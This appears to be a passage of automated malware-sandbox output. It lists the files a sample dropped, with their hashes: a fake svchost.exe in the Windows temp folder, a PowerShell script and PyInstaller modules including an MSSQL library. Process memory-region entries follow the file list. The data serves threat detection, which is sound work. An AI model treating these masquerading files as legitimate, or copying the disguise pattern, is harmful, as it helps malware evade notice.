C:\Windows\hqLA.exeMD5
324b709172e6c707724fe4f48bb9ad92
SHA10f9cda372d9f1e58d4156f8df5dba556e156589c
SHA2567c7f98e132780d0ed823821a26697c8d2088fb8dd9bb04bfd7eede2be61c2edc
SHA51208e0b60c59e862f60979f8b6400b435fc53521ca03df4a60311ade1089b066d0bf5f5321deb09f1ed6b897dba43562c628a599d65c82f074cedbb75546df3596
-
C:\Windows\hqLA.exeMD5
324b709172e6c707724fe4f48bb9ad92
SHA10f9cda372d9f1e58d4156f8df5dba556e156589c
SHA2567c7f98e132780d0ed823821a26697c8d2088fb8dd9bb04bfd7eede2be61c2edc
SHA51208e0b60c59e862f60979f8b6400b435fc53521ca03df4a60311ade1089b066d0bf5f5321deb09f1ed6b897dba43562c628a599d65c82f074cedbb75546df3596
-
C:\Windows\hqLA.exeMD5
324b709172e6c707724fe4f48bb9ad92
SHA10f9cda372d9f1e58d4156f8df5dba556e156589c
SHA2567c7f98e132780d0ed823821a26697c8d2088fb8dd9bb04bfd7eede2be61c2edc
SHA51208e0b60c59e862f60979f8b6400b435fc53521ca03df4a60311ade1089b066d0bf5f5321deb09f1ed6b897dba43562c628a599d65c82f074cedbb75546df3596
-
C:\Windows\m2.ps1MD5
7ac4e48cd81b8595aade2ff6423494e2
SHA185d3a859788029743f1736667ac7cbbaa7a28af5
SHA2563f28cace99d826b3fa6ed3030ff14ba77295d47a4b6785a190b7d8bc0f337e41
SHA51272ad9e077a95d525c2a3cfb8350ac0a55f6d3812a63c0a3f47ba6b3e70dfda44d53d034b5d6829d1182a5b431d856db85f88aa226807b010f383df5374db6633
-
\??\c:\windows\DuooWvQ.exeMD5
2cfcca3c95f3f57b3f7cf849491a16a9
SHA1d86658fe111b8f5055eed0b11069932cde220092
SHA256a379a61dbdf7e2bcd8cbf9ea4a307d753006e7aa1d5ba84555971da7b2930112
SHA51222893b7c5844d43f09054403dfb042418a4083459017da20d5976e0744abe7deae461e34fa940fd65c595a3fd29bf7800d0e3396c828de0bdd23dc89466b0752
-
\??\c:\windows\temp\ipc.txtMD5
58680081011c9e72ab53635200073785
SHA1cf761ed67056c7996eff21490d84de9aad551076
SHA256e45d7b1661c52249d1ebd3642a6d3c41d687324e759802538ede74cff954418d
SHA5125ba15ffefa434f7e5c0556424790649332ed5a283566da9a9f9380df28c850843423a1ed8b789d33a1961583d4fa5e342ecd2760b86d1f001f57855e1ecdc797
-
\??\c:\windows\temp\ipc.txtMD5
58680081011c9e72ab53635200073785
SHA1cf761ed67056c7996eff21490d84de9aad551076
SHA256e45d7b1661c52249d1ebd3642a6d3c41d687324e759802538ede74cff954418d
SHA5125ba15ffefa434f7e5c0556424790649332ed5a283566da9a9f9380df28c850843423a1ed8b789d33a1961583d4fa5e342ecd2760b86d1f001f57855e1ecdc797
-
\??\c:\windows\temp\ipc.txtMD5
58680081011c9e72ab53635200073785
SHA1cf761ed67056c7996eff21490d84de9aad551076
SHA256e45d7b1661c52249d1ebd3642a6d3c41d687324e759802538ede74cff954418d
SHA5125ba15ffefa434f7e5c0556424790649332ed5a283566da9a9f9380df28c850843423a1ed8b789d33a1961583d4fa5e342ecd2760b86d1f001f57855e1ecdc797
-
\??\c:\windows\temp\ipc.txtMD5
58680081011c9e72ab53635200073785
SHA1cf761ed67056c7996eff21490d84de9aad551076
SHA256e45d7b1661c52249d1ebd3642a6d3c41d687324e759802538ede74cff954418d
SHA5125ba15ffefa434f7e5c0556424790649332ed5a283566da9a9f9380df28c850843423a1ed8b789d33a1961583d4fa5e342ecd2760b86d1f001f57855e1ecdc797
-
\??\c:\windows\temp\svchost.exeMD5
ee295d65ae7e59af69edcd0d447fa9ff
SHA1f443e7829df5bf4b055b10741e0bb8f22e1adb9c
SHA256d3e13f99351965c2e5cf876076e9b7680ad458362b3f82034e260534767a4634
SHA5129e863b2fc52718af6c43d844177b6ae831e7abef22c7086a223e49cb6dc39774cf5f8ce9b0a58cc9881469679941311ed6661fb2f803e0c0343c8008f02c0132
-
\??\c:\windows\temp\svchost.exeMD5
2cfcca3c95f3f57b3f7cf849491a16a9
SHA1d86658fe111b8f5055eed0b11069932cde220092
SHA256a379a61dbdf7e2bcd8cbf9ea4a307d753006e7aa1d5ba84555971da7b2930112
SHA51222893b7c5844d43f09054403dfb042418a4083459017da20d5976e0744abe7deae461e34fa940fd65c595a3fd29bf7800d0e3396c828de0bdd23dc89466b0752
-
\??\c:\windows\temp\svchost.exeMD5
2ba800307908f23211fd2032885d8408
SHA18bf1af7e6804f44000e7468b79e40977f2252f57
SHA256f623a7153085421c483b0191af1da86cdf59bcdd5bfca27aa2663f06b71e7eb4
SHA512a65dd46b3d8eabd071e0481d7ef47cae8619c35dcd72c2f79b79668b1fff4ff561724ddd8edb770956ef7ee3a8faa2c91b3e40e2318424a4bb288442d4522f63
-
\Windows\Temp\_MEI3202\Crypto.Cipher._AES.pydMD5
9fd78d7d6ab69af5a14e0f29affd7ef4
SHA134d9251f746f10f656542772c067a56fe686247c
SHA25687c920ed2c1afcf295729563b4def671dc9e36ef8b3e183d4836571300180e74
SHA51273768a900774cc6c96ac2a08589b42d00a2e8bab12dc7d7fa2f6f1b27ef0399668046d3bf94997f8a3a2af8653897f4861bcacfc03e039eba3a7847cd4e0c005
-
\Windows\Temp\_MEI3202\Crypto.Cipher._ARC4.pydMD5
8d85dbf6c981bff4e8a1bea86a0ac5e9
SHA146c4cbc697a63547f2534c0e72e3c85fb98eef7b
SHA256356623219b8c098435d511c0055c061018641d8b700eb089fc6ff87d233260e1
SHA5126d199a2f449cb8fbceae63aa348722c0208b0b23c2c6e1bb17ffd8eb765cb6ca27b8c16fed276e6b7688a685d2230da62a8dbafe4f61a2bf96deca2a4c46ce72
-
\Windows\Temp\_MEI3202\Crypto.Cipher._DES.pydMD5
4b7b86b41280dfd1e1d29a7f626393ef
SHA14917f788b4cd11996e1332d5f376ca0df41370b4
SHA2568b0f41fd5a3d78e7c4990b1df3414c4fa221624444f318bb0a29f92f02b1a15e
SHA51216cabc4bd25ad98d7b277f548a6feed1fb05facabe3796f19ff3a24fd1e2c04c958b4f8cdc7eb1bf3d7cec13e5d02e170a9838ec4d617fe20f4225ac50973b7e
-
\Windows\Temp\_MEI3202\Crypto.Cipher._DES3.pydMD5
f6d78ab78381bf4056335a75ee7c8523
SHA1bcf4557c58cc41d72b2e3abdf3f44aeeb80a2871
SHA2565317f80ae3b32d6a3d4ce013bdf93f5d857e6625bc89c778171983e95865abe4
SHA51254089eef475b446ee12fab1d9e75b0fc1282392f38ce3a5da8c2b29ebd8d4c748033d1f9ca4d7a2254fa7cc464422e12db4af48d43f50f7f108ddb57a7f87d8a
-
\Windows\Temp\_MEI3202\Crypto.Hash._MD4.pydMD5
f98765af6763cfe9ece7136f14f88397
SHA1d826bee700297b1be49c0a682709e87749bd5e38
SHA256d722ed0ee7fef1f30860f83b3fecfa089955ca0d6b522a379efdc34f0401e321
SHA51291e05639af5341405de909867981c345e57f4d1a6e51c5dbe9e31c70570d4bc695b0c3e4e4c241bbb7891fa9127ce5e9b0f8e1a643c2c3e056880bc1b6f582dd
-
\Windows\Temp\_MEI3202\Crypto.Util.strxor.pydMD5
32dce0579bd19ff24bd4a1accf5afc73
SHA130ed1b74d91606f56d15636e4d0773edc575f011
SHA2562170b576f5f22d06e700e5570dc234fa5f77c7fe4af8394f0dac49566f9a8b40
SHA512a0a43a3f50ba4ab33f5dc96f51ed3d086913952a3f7cb1db181d94685a014dc2052e933fd32e46f26c08099a9586e6a4b423169324ce3de7f42aff1052d05b1a
-
\Windows\Temp\_MEI3202\_ctypes.pydMD5
98638a1bfdecdcecf4d7d47b521ac903
SHA1320dd42ee55cfd4016922d5927e1ca4967191315
SHA25611c739d28227773d70c3941d2e979b9d4cee12f1d53cc94daf77b62a4d3a0327
SHA512d1b8eef337219f35769d7061bd760a066522fbb34bde6f1d130897f6522aada2b9bfb15f49559a48534d6c656ef3edcd8689d7d76d72c5f022db3906306022d7
-
\Windows\Temp\_MEI3202\_hashlib.pydMD5
22071845daf8c1f6e87f006673eed4fd
SHA1b3bc158d041aecc313900cf9a7205e13c47dd9a3
SHA25651c47389782bc2de8e401d231233e2e7f1a4b3afce7df4ddf4ad533184dad407
SHA5126a11c1620e60b35d321c340687e03a5d9c9eb07912d95c7ba8b9d25867f246b6f46e23d5ee5ec6999c38a92460e85efd8704100e81492c26e38ba3da0f0e5972
-
\Windows\Temp\_MEI3202\_mssql.pydMD5
e0aa19ec9424664a61a8413cdf346a67
SHA1dd82a340c56a9e1ba895e081adc560a77565c8b5
SHA256d5253b4c05f1f82b066f4d59294dc3f531a74161161a1857d6bbb44d61639608
SHA512b039445276e9370200f1a03f58521b82ac794c5e24772c0dd2e27a08ad80ce179eeb1ca927e530f489354c695c3dd6c2a5301623abfbc9e13aef38b4b9009e06
-
\Windows\Temp\_MEI3202\_multiprocessing.pydMD5
cc3b15be403249398c53d3e7d720893f
SHA11ae2c4090e6e5da395117a21618024ebe8c90219
SHA2566a6b8cb5cad9769a07af9a50bab5b3c848b411f66d7723c7e4c65d9e7dbe08ed
SHA5126ec8e0ea676d5cf5de775cb7fcb87b59d3c773bf5f080e75fbfded0b643af85341ad7c8f9b4153c25e11e3fbc751ddf620f7027037046081e2c23e49452cad13
-
\Windows\Temp\_MEI3202\_socket.pydMD5
b7c3e334648a6cbb03b550b842818409
SHA1767be295f1e4adedf0e10532f9c1b7908d17383a
SHA256f0781a1b879584f494d984e31869eab13f0535825f68862e6597b1639df708bd
SHA51243ee04452b685022bfdbaca5b3603d4c0e406599b8da70c6a25fa2c4ac5543ada4521eba9bbf0ca86a2a4775ce474ab89da7d27f842d63df62048a1b7ca431d1
-
\Windows\Temp\_MEI3202\_ssl.pydMD5
27a7a40b2b83578e0c3bffb5a167d67a
SHA1d20a7d3308990ce04839569b66f8639d6ed55848
SHA256ea0efcab32e6572f61a3c765356e283bd6a8f75ec2a4c8b12f1fb3db76ca68d4
SHA5127b97690b9ab68562ca85ce0ffc56ae517f8fafe44caff846d66bb4c2003aa6d1b0b321d9ea4526c4652b5152ec46dc600671f427957e6e847ba75ced0d09acef
-
\Windows\Temp\_MEI3202\bz2.pydMD5
0b1688c02640ec14d85e1cc3c93f7276
SHA103779f13640f6786e3127c76316a35a2922fc149
SHA256753ea279675eeb34fe58908f10cb15886955c865b49c01b533a5930e6b326038
SHA5120b109bb5924b20cde6d33d335404a944c088d34f009412074d0569e62e1d3f5326f41b2a0b9afbe2ddbeb43e3054cecdd63829a7f88e6db6f72bce77a9f3ec82
-
\Windows\Temp\_MEI3202\msvcr90.dllMD5
cdbe9690cf2b8409facad94fac9479c9
SHA14bcdfe2c1b354645314a4ce26b55b2b1a0212db9
SHA2568e7fe1a1f3550c479ffd86a77bc9d10686d47f8727025bb891d8f4f0259354c8
SHA5129c84ed9a66ce20a22e14fa00c1a0db716133f7b2450a3c0d20b1dcf74e030337c4c6a4953e40e10fc94706dc607236e773ba8999b21bd6e072ab24a487e8f942
-
\Windows\Temp\_MEI3202\python27.dllMD5
f5c5c0d5d9e93d6e8cb66b825cd06230
SHA1da7be79dd502a89cf6f23476e5f661eebd89342b
SHA256e3eed66221a6552d4b9ae7350b3dc30de238a6029efae060514d2780c02fedb4
SHA5128a13b15884f8450396b8f18597dfe62f0e13e7ab524d95de5b7b0497a64e52f26b22f977803280b1916fc2b45c52a92ab501a6fb8ad86970d8326be72f735279
-
\Windows\Temp\_MEI3202\pywintypes27.dllMD5
f3ef005e60f838eaaa44529daeeb93ab
SHA10f8730caea9f7b16c2e90f6551a90b80b994688f
SHA256241ecbd87410e9b23339d494f9eca7ddf8083472661989f489fdd7fe0b8776b4
SHA5128c57d5b6a5b44b26fb943b0d5ddd5d80eeac2488e91f538e361781e727f931717bb3d5a0811ae7c8dd85122e74b08c54c3384fd2fc0db79e0b0e7fbfc8160d20
-
\Windows\Temp\_MEI3202\select.pydMD5
dcee0dbcf84cc9f1620f168d8f8f9fd1
SHA19f570fa253c24a8fe56948f4c6e79982d9644a3b
SHA256385e7a3cf5dd7b65590b064e7bc09f901db7ddc8542396af6bb60048a30993f0
SHA5125b89fe78e841bd05a7c4a626d9b06aa200f8c7d0ebf3b9124aa4440159636fc20ced725d2fe61de7bb4dc210060fddd36f785309a536293455cb863ebff00e77
-
\Windows\Temp\_MEI3202\win32api.pydMD5
4808fc8e377c68afc58e512eaeb92984
SHA15d30fb56abd2a4e66108a8e8cd21450a7e29dcc4
SHA25663112adebc44d8183faa148e53cc48ddda0a9fb11c7d15a1ef5c8b36023f1205
SHA5127c8994a78022499561d69893c67c4f16dcc826ba42bed01bb079324c980946a50463737e7f96f13915aa0a2728ff4555d61c33d7c7375de69e0d71f9347f66f4
-
\Windows\Temp\_MEI3202\win32event.pydMD5
997b91ab18b0e50a458b6093a77c1f51
SHA18d8f247600ba0210912270f960193fb039e57ba0
SHA2563f2d34661fd5cc1c800c121ad8ed1077ad62888a688fea23dcf2617aceed2d7c
SHA5123ee618c1759ccdb357817f50cab91f3f1d5d5af3b147539f711508a7debe5f57c69072189b9261af539b101047963f3a233a03517839592f431e2ac1f1ad9aff
-
memory/320-20-0x0000000000000000-mapping.dmp
-
memory/384-6-0x00000000003B0000-0x00000000003BC000-memory.dmpFilesize
48KB
-
memory/384-3-0x00000000011F0000-0x00000000011F1000-memory.dmpFilesize
4KB
-
memory/384-5-0x0000000004DE0000-0x0000000004DE1000-memory.dmpFilesize
4KB
-
memory/384-2-0x0000000074390000-0x0000000074A7E000-memory.dmpFilesize
6.9MB
-
memory/384-82-0x00000000051F0000-0x0000000005261000-memory.dmpFilesize
452KB
-
memory/384-83-0x00000000005B0000-0x00000000005E1000-memory.dmpFilesize
196KB
-
memory/456-180-0x0000000000000000-mapping.dmp
-
memory/464-9-0x0000000000000000-mapping.dmp
-
memory/512-164-0x0000000000000000-mapping.dmp
-
memory/576-68-0x0000000000000000-mapping.dmp
-
memory/596-152-0x0000000000000000-mapping.dmp
-
memory/736-120-0x0000000000000000-mapping.dmp
-
memory/788-11-0x0000000000000000-mapping.dmp
-
memory/788-127-0x0000000000000000-mapping.dmp
-
memory/808-14-0x0000000000000000-mapping.dmp
-
memory/840-12-0x0000000000000000-mapping.dmp
-
memory/844-136-0x0000000000000000-mapping.dmp
-
memory/956-148-0x0000000000000000-mapping.dmp
-
memory/1000-18-0x0000000000000000-mapping.dmp
-
memory/1004-147-0x0000000000000000-mapping.dmp
-
memory/1004-144-0x0000000000000000-mapping.dmp
-
memory/1040-150-0x0000000000000000-mapping.dmp
-
memory/1080-132-0x0000000000000000-mapping.dmp
-
memory/1084-84-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/1084-85-0x000000000042977E-mapping.dmp
-
memory/1084-86-0x0000000074390000-0x0000000074A7E000-memory.dmpFilesize
6.9MB
-
memory/1084-87-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/1084-117-0x00000000010C0000-0x00000000010C1000-memory.dmpFilesize
4KB
-
memory/1148-64-0x0000000000000000-mapping.dmp
-
memory/1240-131-0x0000000000000000-mapping.dmp
-
memory/1324-125-0x0000000000000000-mapping.dmp
-
memory/1528-7-0x0000000000000000-mapping.dmp
-
memory/1528-8-0x0000000076241000-0x0000000076243000-memory.dmpFilesize
8KB
-
memory/1596-188-0x0000000000000000-mapping.dmp
-
memory/1600-140-0x0000000000000000-mapping.dmp
-
memory/1624-17-0x0000000000000000-mapping.dmp
-
memory/1624-161-0x0000000000000000-mapping.dmp
-
memory/1628-69-0x0000000000000000-mapping.dmp
-
memory/1628-118-0x0000000000000000-mapping.dmp
-
memory/1636-190-0x0000000000000000-mapping.dmp
-
memory/1636-16-0x0000000000000000-mapping.dmp
-
memory/1660-143-0x0000000000000000-mapping.dmp
-
memory/1708-145-0x0000000000000000-mapping.dmp
-
memory/1748-130-0x0000000000000000-mapping.dmp
-
memory/1752-22-0x0000000000000000-mapping.dmp
-
memory/1828-70-0x0000000000000000-mapping.dmp
-
memory/1856-134-0x0000000000000000-mapping.dmp
-
memory/1860-71-0x0000000000000000-mapping.dmp
-
memory/1864-182-0x0000000000000000-mapping.dmp
-
memory/1908-138-0x0000000000000000-mapping.dmp
-
memory/1968-129-0x0000000000000000-mapping.dmp
-
memory/1972-67-0x0000000000000000-mapping.dmp
-
memory/1988-80-0x0000000001120000-0x0000000001121000-memory.dmpFilesize
4KB
-
memory/1988-91-0x00000000194E0000-0x00000000194E1000-memory.dmpFilesize
4KB
-
memory/1988-77-0x0000000019530000-0x0000000019532000-memory.dmpFilesize
8KB
-
memory/1988-76-0x00000000195B0000-0x00000000195B1000-memory.dmpFilesize
4KB
-
memory/1988-75-0x0000000000EE0000-0x0000000000EE1000-memory.dmpFilesize
4KB
-
memory/1988-79-0x0000000000E30000-0x0000000000E31000-memory.dmpFilesize
4KB
-
memory/1988-74-0x000007FEF52C0000-0x000007FEF5CAC000-memory.dmpFilesize
9.9MB
-
memory/1988-107-0x000000001A010000-0x000000001A011000-memory.dmpFilesize
4KB
-
memory/1988-146-0x000000001953A000-0x0000000019559000-memory.dmpFilesize
124KB
-
memory/1988-73-0x000007FEFB9D1000-0x000007FEFB9D3000-memory.dmpFilesize
8KB
-
memory/1988-72-0x0000000000000000-mapping.dmp
-
memory/1988-99-0x0000000019520000-0x0000000019521000-memory.dmpFilesize
4KB
-
memory/1988-96-0x0000000019380000-0x0000000019381000-memory.dmpFilesize
4KB
-
memory/1988-108-0x000000001AD30000-0x000000001AD31000-memory.dmpFilesize
4KB
-
memory/1988-115-0x000000001A040000-0x000000001A041000-memory.dmpFilesize
4KB
-
memory/1988-116-0x000000001ADC0000-0x000000001ADC1000-memory.dmpFilesize
4KB
-
memory/1988-97-0x0000000019390000-0x0000000019391000-memory.dmpFilesize
4KB
-
memory/1988-100-0x0000000019E80000-0x0000000019E81000-memory.dmpFilesize
4KB
-
memory/1988-98-0x0000000019E60000-0x0000000019E61000-memory.dmpFilesize
4KB
-
memory/1988-78-0x0000000019534000-0x0000000019536000-memory.dmpFilesize
8KB
-
memory/1996-122-0x0000000000000000-mapping.dmp
-
memory/2020-65-0x0000000000000000-mapping.dmp
-
memory/2044-66-0x0000000000000000-mapping.dmp
-
memory/2328-165-0x0000000000000000-mapping.dmp
-
memory/2328-171-0x0000000000000000-mapping.dmp
-
memory/2420-166-0x0000000000000000-mapping.dmp
-
memory/2820-169-0x0000000000000000-mapping.dmp
-
memory/2876-168-0x0000000000000000-mapping.dmp
-
memory/2912-153-0x0000000000000000-mapping.dmp
-
memory/2952-155-0x0000000000000000-mapping.dmp
-
memory/2964-186-0x0000000000000000-mapping.dmp
-
memory/3000-157-0x0000000000000000-mapping.dmp
-
memory/3004-173-0x0000000000000000-mapping.dmp
-
memory/3024-175-0x0000000000000000-mapping.dmp
-
memory/3044-159-0x0000000000000000-mapping.dmp
-
memory/3060-192-0x0000000000000000-mapping.dmp
-
memory/3084-177-0x0000000000000000-mapping.dmp
-
memory/3108-183-0x0000000000000000-mapping.dmp
-
memory/3112-185-0x0000000000000000-mapping.dmp
-
memory/3168-178-0x0000000000000000-mapping.dmp
-
memory/3300-179-0x0000000000000000-mapping.dmp